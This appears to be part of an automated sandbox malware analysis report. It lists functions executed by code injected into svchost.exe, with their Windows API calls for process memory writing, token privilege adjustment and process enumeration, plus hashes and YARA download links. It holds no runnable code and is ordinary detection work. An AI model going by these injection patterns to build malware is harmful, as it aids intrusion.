Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID: #2379#2514#324#641H_prolog
String ID:
API String ID: 2768629142-0
Opcode ID: 5b5c97468d7a1e2bb2ff698cdfdf4de53724e6bfa7d1a2238b5b72a011e947e1
Instruction ID: 02f2689a69859cdcfeaac5338440bd1b7242c65d1092270e31ce3d22fc5a2906
Opcode Fuzzy Hash: 5b5c97468d7a1e2bb2ff698cdfdf4de53724e6bfa7d1a2238b5b72a011e947e1
Instruction Fuzzy Hash: 50E039319015089BCB14EBA1CA5A7ADB334AF20318F60853AA422775E1DBB88A08CA19

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exe PID: 284 Parent PID: 3088 svchost.exeCOMMON

Execution Graph

Execution Coverage:	16.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.5%
Total number of Nodes:	1838
Total number of Limit Nodes:	123

Executed Functions

Function 0007B420, Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 531
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32 ref: 0007B541
AdjustTokenPrivileges.KERNELBASE ref: 0007B589

Part of subcall function 000708A0: LoadLibraryExW.KERNELBASE ref: 000708C4

RevertToSelf.KERNELBASE ref: 0007B766
GetTokenInformation.ADVAPI32 ref: 0007B7F1
GetTokenInformation.ADVAPI32 ref: 0007B816
LookupAccountSidW.ADVAPI32 ref: 0007B86C
CreateProcessAsUserW.KERNEL32 ref: 0007B998
AdjustTokenPrivileges.KERNELBASE ref: 0007BA3B

Strings

8, xrefs: 0007B8B4

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: Token$AdjustInformationLookupPrivileges$AccountCreateLibraryLoadPrivilegeProcessRevertSelfUserValue
String ID: 8
API String ID: 1764623306-4194326291
Opcode ID: e004605450e611007187f55cc7a5976e81f1e07e92930ef2313076f132602453
Instruction ID: fdf82c843862c23529b60160118c15cbae042d970057da7475b6ec6b15661438
Opcode Fuzzy Hash: e004605450e611007187f55cc7a5976e81f1e07e92930ef2313076f132602453
Instruction Fuzzy Hash: E802093060CB488FE7A4DF29D8457AAB7E5FBD8311F108A2E958EC3250DB78D941CB46

Uniqueness

Uniqueness Score: -1.00%

Function 000768F0, Relevance: 14.6, APIs: 7, Strings: 1, Instructions: 555
injectionthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNEL32 ref: 000769B1
DuplicateHandle.KERNEL32 ref: 000769ED
DuplicateHandle.KERNEL32 ref: 00076A2B
WriteProcessMemory.KERNELBASE ref: 00076A93
WriteProcessMemory.KERNELBASE ref: 00076C91

Part of subcall function 0006A2B0: NtQueryInformationProcess.NTDLL ref: 0006A2D8

WriteProcessMemory.KERNELBASE ref: 00076D2C
ResumeThread.KERNELBASE ref: 00076D9C

Strings

@, xrefs: 00076C47

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: Process$DuplicateHandleMemoryWrite$InformationQueryResumeThread
String ID: @
API String ID: 124585367-2766056989
Opcode ID: 90d8aa4a37eab144e60c92ab65722a77f25cdfe5a40cc8030affaa0ed7c1d5b7
Instruction ID: 2d77929e9b498c13caf13fc07a735db76f58b42e0686f24ece32115e5161af9d
Opcode Fuzzy Hash: 90d8aa4a37eab144e60c92ab65722a77f25cdfe5a40cc8030affaa0ed7c1d5b7
Instruction Fuzzy Hash: BC020F70718B488FE7A8EF28D45976AB6E1FB99301F54452EE04EC3291DF39D841CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00061B50, Relevance: 9.7, APIs: 4, Strings: 1, Instructions: 905
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE ref: 00061CD8
WriteProcessMemory.KERNELBASE ref: 00061E0F
WriteProcessMemory.KERNELBASE ref: 00061E5F
WriteProcessMemory.KERNELBASE ref: 00062210

Strings

@, xrefs: 00061EFE

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: @
API String ID: 3559483778-2766056989
Opcode ID: 68081a6a96ff719023c6dd7f1217f6f2967709c9a1996ae361997835c583afdf
Instruction ID: e7bb6df4ab1262c3a2725ff1bb5da8dc3a6ed93e755067277b958428cfc27be8
Opcode Fuzzy Hash: 68081a6a96ff719023c6dd7f1217f6f2967709c9a1996ae361997835c583afdf
Instruction Fuzzy Hash: 85621D30618B498FDBA4DF28C4557EAB7E2FB98310F54892DD48EC3255DB74E981CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00061180, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 314
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00061242
FindNextFileW.KERNELBASE ref: 000614B1
FindClose.KERNELBASE ref: 000614C2

Part of subcall function 000741F0: RtlReAllocateHeap.NTDLL ref: 0007425D

Strings

ductVersion, xrefs: 0006128E
., xrefs: 000612EB

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: Find$File$AllocateCloseFirstHeapNext
String ID: .$ductVersion
API String ID: 2963102669-227499276
Opcode ID: ca38949c777ab98e638dfd563647ca82e96a61ce8aee6928ad1aba70e3c4d6ba
Instruction ID: 1294b7351c403f64f1c4598a0608ea69b3fcebc94e3f026d69048bb43f88400f
Opcode Fuzzy Hash: ca38949c777ab98e638dfd563647ca82e96a61ce8aee6928ad1aba70e3c4d6ba
Instruction Fuzzy Hash: 6E913931A1CB1C8AEB75AB15D4487FA72E3FFD0310F59816EC44AD72B1EE7989868341

Uniqueness

Uniqueness Score: -1.00%

Function 00072350, Relevance: 7.7, APIs: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE ref: 0007241C

Part of subcall function 000708A0: LoadLibraryExW.KERNELBASE ref: 000708C4

RevertToSelf.KERNELBASE ref: 000724AC
CloseHandle.KERNELBASE ref: 000724F7
AdjustTokenPrivileges.KERNELBASE ref: 00072528
CloseHandle.KERNELBASE ref: 00072533

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken$LibraryLoadRevertSelf
String ID:
API String ID: 1399662949-0
Opcode ID: f6c68b0a12c7740e07406042baab3dd624769e1347a5db0dcf14f59941ae9171
Instruction ID: b080f66a1d65c7ed5829432e289cac6ee1d9f5183ef780b073ffbaee26cdc0eb
Opcode Fuzzy Hash: f6c68b0a12c7740e07406042baab3dd624769e1347a5db0dcf14f59941ae9171
Instruction Fuzzy Hash: 16518330608A498FEB94EF28D85876A77E5FBD8351F54452EE48EC32A0DB78D941CB06

Uniqueness

Uniqueness Score: -1.00%

Function 0006B160, Relevance: 6.7, APIs: 4, Instructions: 707
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAddVectoredExceptionHandler.NTDLL ref: 0006B206
SetCurrentDirectoryW.KERNELBASE ref: 0006B25B

Part of subcall function 000741F0: RtlReAllocateHeap.NTDLL ref: 0007425D

CreateThread.KERNELBASE ref: 0006B45D
SleepEx.KERNEL32 ref: 0006B832

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: AllocateCreateCurrentDirectoryExceptionHandlerHeapSleepThreadVectored
String ID:
API String ID: 3398064959-0
Opcode ID: 9c706092d039592753fe6d02690c27b74e86a592be0aade5db181b6b63d05bf4
Instruction ID: 9a466b669d77621987ddc4319c0355e7d5d294ab7414c70bb440996955d1a11f
Opcode Fuzzy Hash: 9c706092d039592753fe6d02690c27b74e86a592be0aade5db181b6b63d05bf4
Instruction Fuzzy Hash: 40323770618E19CFE794EB28DC957A973E2FBD4301F508529E44AC72A2DF78D881CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0006BA80, Relevance: 4.6, APIs: 3, Instructions: 95
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0006BA98
Process32FirstW.KERNEL32 ref: 0006BAEF
Process32NextW.KERNEL32 ref: 0006BB2A

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: Process32$CreateFirstNextSnapshotToolhelp32
String ID:
API String ID: 1238713047-0
Opcode ID: 2790ab96b67199f172ac90e59d4fa2fd9bc239d09c0467787c2f8b04b2aa6acf
Instruction ID: 17d21f6b24d6b88ebd5955d7baadd4e73c51a38c4d3cd0f23af4f089801db05e
Opcode Fuzzy Hash: 2790ab96b67199f172ac90e59d4fa2fd9bc239d09c0467787c2f8b04b2aa6acf
Instruction Fuzzy Hash: 1F215731718E184FD7A8A728A8497EF72E6E7C9310F549569E00EC318ADE389D1687C5

Uniqueness

Uniqueness Score: -1.00%

Function 0007AB10, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 572
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000741F0: RtlReAllocateHeap.NTDLL ref: 0007425D

CreateThread.KERNELBASE ref: 0007AF4A

Strings

D, xrefs: 0007AD3B

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: AllocateCreateHeapThread
String ID: D
API String ID: 1794330159-2746444292
Opcode ID: 0e93ed8074f0fc8e3cf422c59ebd51f4fa4b97833a55ccafe047e9e02fd2c121
Instruction ID: 92521d6f8d819a317dbb5b25cc6908a813fecb2e1dc5aa14db22354cede5db0b
Opcode Fuzzy Hash: 0e93ed8074f0fc8e3cf422c59ebd51f4fa4b97833a55ccafe047e9e02fd2c121
Instruction Fuzzy Hash: 7EF18330B18E0D8FDB98EF68C455A6977D2FBD9300B54856DE40EC7262DF38E8418B96

Uniqueness

Uniqueness Score: -1.00%

Function 0006A2B0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 94
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 0006A2D8

Strings

@, xrefs: 0006A360

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: InformationProcessQuery
String ID: @
API String ID: 1778838933-2766056989
Opcode ID: eb8dde6631860702aeb7abf93a5e22c1ce278ba1114d80f18fbfe8cca2382891
Instruction ID: 9d1ee7ee9d0b548802ca3ea0459c0341634a38a6934577fe62488ed5da1b276f
Opcode Fuzzy Hash: eb8dde6631860702aeb7abf93a5e22c1ce278ba1114d80f18fbfe8cca2382891
Instruction Fuzzy Hash: 0D319F31218A588FE7A4EB18D848F9AB7E7FBDD300F40462DE08EC3240DB389645CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00066B60, Relevance: 3.5, APIs: 2, Instructions: 454
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32 ref: 00066D5B
CloseHandle.KERNELBASE ref: 00066D95

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: CloseFolderHandlePath
String ID:
API String ID: 1943059022-0
Opcode ID: 3aae3d7cb76815592ecfb975ba838a1ffbb3d0d009fbb676da2f40e204e226dd
Instruction ID: bc6fdd6e8ffd66b81772d16755c27774893569230f473c6067776ba9deb0115c
Opcode Fuzzy Hash: 3aae3d7cb76815592ecfb975ba838a1ffbb3d0d009fbb676da2f40e204e226dd
Instruction Fuzzy Hash: 45D1A430618E5D8FD7A5EB28D8547BAB3E2FF95320F50462DE48AC3291EB35D941C782

Uniqueness

Uniqueness Score: -1.00%

Function 0006BD80, Relevance: 3.4, APIs: 2, Instructions: 361fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE ref: 0006BF80
FindNextFileW.KERNELBASE ref: 0006C13C

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: 1d258c973945a2fe29ebb2c595d87a8102c1c3fbbb0c8601790bb537bc0e346d
Instruction ID: 71236af602337b865bd910ffa41f72a10469b3d4a544cf1df8f12ee1ae33c0ee
Opcode Fuzzy Hash: 1d258c973945a2fe29ebb2c595d87a8102c1c3fbbb0c8601790bb537bc0e346d
Instruction Fuzzy Hash: 12B12B60518B1C8AE775AF14D884BFA73D2FF55304F50416ED486CB1B2EF7A9885C781

Uniqueness

Uniqueness Score: -1.00%

Function 000782C0, Relevance: 3.2, APIs: 2, Instructions: 193fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE ref: 0007838D
FindNextFileW.KERNELBASE ref: 00078446

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: ea23e236ac7efdf717ef08621ab6bb3759164193f4346cebd5eb8af45b4ebbb2
Instruction ID: 9c3e86b51c539a79c0dcb0d14ca65e1e48bdc2eaeeac6a5d7f3465789076ab97
Opcode Fuzzy Hash: ea23e236ac7efdf717ef08621ab6bb3759164193f4346cebd5eb8af45b4ebbb2
Instruction Fuzzy Hash: 1951D83166CA0D4FE3A5AB29D84D6BB72D1FB85310F40862DD48FC3161EF7899468785

Uniqueness

Uniqueness Score: -1.00%

Function 0006C960, Relevance: 2.0, APIs: 1, Instructions: 538fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 0006CA11

Part of subcall function 000741F0: RtlReAllocateHeap.NTDLL ref: 0007425D

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: AllocateCreateFileHeap
String ID:
API String ID: 3125202945-0
Opcode ID: b40eb809acdab95cd939c7386870563c170c6c237224f9346566b4a1e0d19639
Instruction ID: 012d124d8edfe95bf6c8e7cae0e4b03faf09f91e636a5b7c345ffb5ab24d0fe9
Opcode Fuzzy Hash: b40eb809acdab95cd939c7386870563c170c6c237224f9346566b4a1e0d19639
Instruction Fuzzy Hash: 33E1C631718A084FE758EB3C98567BA73D3EBD9310F54466EE48BC3292EE74DC428685

Uniqueness

Uniqueness Score: -1.00%

Function 00070660, Relevance: 1.7, APIs: 1, Instructions: 218COMMON

Download Yara Rule

APIs

Part of subcall function 000741F0: RtlReAllocateHeap.NTDLL ref: 0007425D

getaddrinfo.WS2_32 ref: 000707A4

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: AllocateHeapgetaddrinfo
String ID:
API String ID: 1480277961-0
Opcode ID: bec2093482fc225a80cc1de5235e893a0f9c0113bbab11b97066ba9ff3a119e6
Instruction ID: 8201f2db72fb269b5017d1adadf2b03fcd510cf7e9ad5f90699fb4085c66148e
Opcode Fuzzy Hash: bec2093482fc225a80cc1de5235e893a0f9c0113bbab11b97066ba9ff3a119e6
Instruction Fuzzy Hash: BC519330A1CB498BD7E89B19D8557BEB6D2FBC5310F50862DE48EC3252DE78D841C687

Uniqueness

Uniqueness Score: -1.00%

Function 0007C2F0, Relevance: 1.7, APIs: 1, Instructions: 178encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32 ref: 0007C332

Part of subcall function 000741F0: RtlReAllocateHeap.NTDLL ref: 0007425D

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: AcquireAllocateContextCryptHeap
String ID:
API String ID: 4180873627-0
Opcode ID: 4c477fdf283322236ab4087b6069fc182ee44987ae4a86ccc6c1ae3928896a65
Instruction ID: 288ef4b2f4ddbd9cb6a20649237a82ffbe75e812543e8cbe20c296b76ef82c47
Opcode Fuzzy Hash: 4c477fdf283322236ab4087b6069fc182ee44987ae4a86ccc6c1ae3928896a65
Instruction Fuzzy Hash: 9F51717161CB084FEBA8DF2CD854B6ABBE5FB99701F04856EA44EC3251DB38D8418B85

Uniqueness

Uniqueness Score: -1.00%

Function 00067AE0, Relevance: 1.6, APIs: 1, Instructions: 148COMMON

Download Yara Rule

APIs

GetAdaptersInfo.IPHLPAPI ref: 00067B49

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: AdaptersInfo
String ID:
API String ID: 3177971545-0
Opcode ID: d87491ddda81b6ef334a1c8df71bb553e244bd40e895009f363857ba7b531127
Instruction ID: 959dc4072c0e160d727f3fc7be84a8c6477d3b712d237fd99f3abd9d7519d0f2
Opcode Fuzzy Hash: d87491ddda81b6ef334a1c8df71bb553e244bd40e895009f363857ba7b531127
Instruction Fuzzy Hash: 5241E93021CA094FE798EB69D8A5BAAB7D2FBD4314F84456DF44EC3252DF78D8068381

Uniqueness

Uniqueness Score: -1.00%

Function 00065980, Relevance: 1.6, APIs: 1, Instructions: 131encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32 ref: 000659BD

Part of subcall function 000741F0: RtlReAllocateHeap.NTDLL ref: 0007425D

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: AcquireAllocateContextCryptHeap
String ID:
API String ID: 4180873627-0
Opcode ID: 197087bf80b297701a6298fbfd796fc5a01ea9d9c249bcef6ce2f122048871da
Instruction ID: 4adb7f2a2f5e799370ed9747ef61abfa247ce5f89b80b150c2fe2ec7a8682c90
Opcode Fuzzy Hash: 197087bf80b297701a6298fbfd796fc5a01ea9d9c249bcef6ce2f122048871da
Instruction Fuzzy Hash: 81413D3120DB058FE794DF69D894B6BB7E6EBD9351F40462DA48AC3250DF34D841CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0006F6A0, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 378
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFreeEx.KERNELBASE ref: 0006FA0E
VirtualFreeEx.KERNELBASE ref: 0006FA31
VirtualFreeEx.KERNELBASE ref: 0006FA54
VirtualFreeEx.KERNELBASE ref: 0006FA74

Part of subcall function 000610D0: WriteProcessMemory.KERNELBASE ref: 00061121

Strings

@, xrefs: 0006F7C8

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: FreeVirtual$MemoryProcessWrite
String ID: @
API String ID: 1258994222-2766056989
Opcode ID: 65e366d9a48b42842fb2a8c32e393f8d26e214fd23d22352f7e43c932151c0d9
Instruction ID: 0c501d3358812cdbd5e0cb09ef225ee89f3dc993d17a85349462921876757436
Opcode Fuzzy Hash: 65e366d9a48b42842fb2a8c32e393f8d26e214fd23d22352f7e43c932151c0d9
Instruction Fuzzy Hash: EBC12D7061CB4A8FE7A8DB2CE4557A6B7E2FB98301F54452DE48EC3251DB34D841CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00063EB0, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 229
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000741F0: RtlReAllocateHeap.NTDLL ref: 0007425D

WriteProcessMemory.KERNELBASE ref: 00063FEF
WriteProcessMemory.KERNELBASE ref: 00064046
VirtualFreeEx.KERNELBASE ref: 000640EC

Strings

@, xrefs: 00063FA8

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: MemoryProcessWrite$AllocateFreeHeapVirtual
String ID: @
API String ID: 2974855811-2766056989
Opcode ID: 68d04c375a8205cc2208546561f30c5e2123634765324a9bc34a5bf35801bf78
Instruction ID: 1ebaa48a7618e3e82c88b903e81b56ffe3c1b31fdb2692a627f72bb581fc2936
Opcode Fuzzy Hash: 68d04c375a8205cc2208546561f30c5e2123634765324a9bc34a5bf35801bf78
Instruction Fuzzy Hash: 7961513151CB588FE7A8AF18D848BA6B7E1FB98300F50456EE58EC3151DF34D845C786

Uniqueness

Uniqueness Score: -1.00%

Function 00061610, Relevance: 4.8, APIs: 3, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFreeEx.KERNELBASE ref: 000618FD

Part of subcall function 000610D0: WriteProcessMemory.KERNELBASE ref: 00061121

VirtualFreeEx.KERNELBASE ref: 0006181A
VirtualFreeEx.KERNELBASE ref: 00061861

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: FreeVirtual$MemoryProcessWrite
String ID:
API String ID: 1258994222-0
Opcode ID: 539930e52a86986f0b9b486daf54859480b50b3049dc62d96bee2a3ec40b9f6d
Instruction ID: 87e477e5aca0e63ff96a365e4a549732d35c7d4907b8c25433fe3aefc7f24ebe
Opcode Fuzzy Hash: 539930e52a86986f0b9b486daf54859480b50b3049dc62d96bee2a3ec40b9f6d
Instruction Fuzzy Hash: 2891AF3062CF4D4FD7A9AB6894447ABB6E2FB98301F68452DE48EC3251DF74D842C786

Uniqueness

Uniqueness Score: -1.00%

Function 0007DBE0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationW.KERNELBASE ref: 0007DC6C

Strings

C, xrefs: 0007DC26

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: InformationVolume
String ID: C
API String ID: 2039140958-1037565863
Opcode ID: f577e1e7017351a0ecee6702b4e1ffc4f794e4c3b838430484c108c7abe01514
Instruction ID: 9f5774c242b9231bad424c0a46e210f31918c341fe13f3d54a5fd73ad7bcc92d
Opcode Fuzzy Hash: f577e1e7017351a0ecee6702b4e1ffc4f794e4c3b838430484c108c7abe01514
Instruction Fuzzy Hash: 0431D331A28B548BD3559F28D84476BBBE1FFC9304F40892FF089C3251DB799906C796

Uniqueness

Uniqueness Score: -1.00%

Function 000610D0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE ref: 00061121

Strings

@, xrefs: 000610E4

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: @
API String ID: 3559483778-2766056989
Opcode ID: 29b76ccb1bd237acbcc42fec80304c9adcf9a13349d627d2d1d4eaf1dc95eafd
Instruction ID: c31538d8488f37117b6f91db1130428caec57749de1850c55000ee64daf9c854
Opcode Fuzzy Hash: 29b76ccb1bd237acbcc42fec80304c9adcf9a13349d627d2d1d4eaf1dc95eafd
Instruction Fuzzy Hash: A101F53171CA184FE7689B2DAC0D77676C6E7CA725F18026FE58AC3255DE28CC028288

Uniqueness

Uniqueness Score: -1.00%

Function 00077ED0, Relevance: 3.3, APIs: 2, Instructions: 318COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE ref: 00078125
CreateDirectoryW.KERNELBASE ref: 00078146

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: f9ab71d2c748ed718ad8a5bfc110c60dcaed0021cfd7166b0873dd4bff3871cb
Instruction ID: 670f184d7a29862fd066e61293645fcd9c6889ebc31c40962cd4d4a40af13709
Opcode Fuzzy Hash: f9ab71d2c748ed718ad8a5bfc110c60dcaed0021cfd7166b0873dd4bff3871cb
Instruction Fuzzy Hash: 29A1723061CA088FDB98EB18D855AAB77E6FBD8300F40865DE44EC7256DE34E941CBC6

Uniqueness

Uniqueness Score: -1.00%

Function 0006D3E0, Relevance: 3.3, APIs: 2, Instructions: 262COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 0006D5E1
SleepEx.KERNEL32 ref: 0006D5E9

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2d3152c3f3b5235e6e4ade2c1a6db4445664d5c0c5a5e37c905f9b1bba235cdc
Instruction ID: 43fcb2a1336e6d6dcbba2381e01f5ed30ef5fe0473c2eb8e16e2e3d951a00ee5
Opcode Fuzzy Hash: 2d3152c3f3b5235e6e4ade2c1a6db4445664d5c0c5a5e37c905f9b1bba235cdc
Instruction Fuzzy Hash: 11714071A18E488FCB58EF0CC499D69B3E2FB69314B41056FE54FC7662DA31EC408B82

Uniqueness

Uniqueness Score: -1.00%

Function 000678E0, Relevance: 3.2, APIs: 2, Instructions: 193COMMON

Download Yara Rule

APIs

Part of subcall function 000741F0: RtlReAllocateHeap.NTDLL ref: 0007425D

GetComputerNameW.KERNEL32 ref: 00067942
SleepEx.KERNEL32 ref: 00067A59

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: AllocateComputerHeapNameSleep
String ID:
API String ID: 1963305231-0
Opcode ID: dd4b16ed457b469663b7dce90b541681b3991495ad2466e0d67a2823cfeb5b84
Instruction ID: b184a4fd34ebffca596c98160ee10878eef412b33778c35ed16906ca0b05a08e
Opcode Fuzzy Hash: dd4b16ed457b469663b7dce90b541681b3991495ad2466e0d67a2823cfeb5b84
Instruction Fuzzy Hash: 1C51183161CA088FE758AB58D8997BA77D2FBD8314F94452EE44FC3251EA39C842C683

Uniqueness

Uniqueness Score: -1.00%

Function 00078668, Relevance: 3.1, APIs: 2, Instructions: 118comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32 ref: 00078691
CoSetProxyBlanket.OLE32 ref: 00078725

Part of subcall function 0006BA80: CreateToolhelp32Snapshot.KERNEL32 ref: 0006BA98
Part of subcall function 0006BA80: Process32FirstW.KERNEL32 ref: 0006BAEF
Part of subcall function 0006BA80: Process32NextW.KERNEL32 ref: 0006BB2A

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

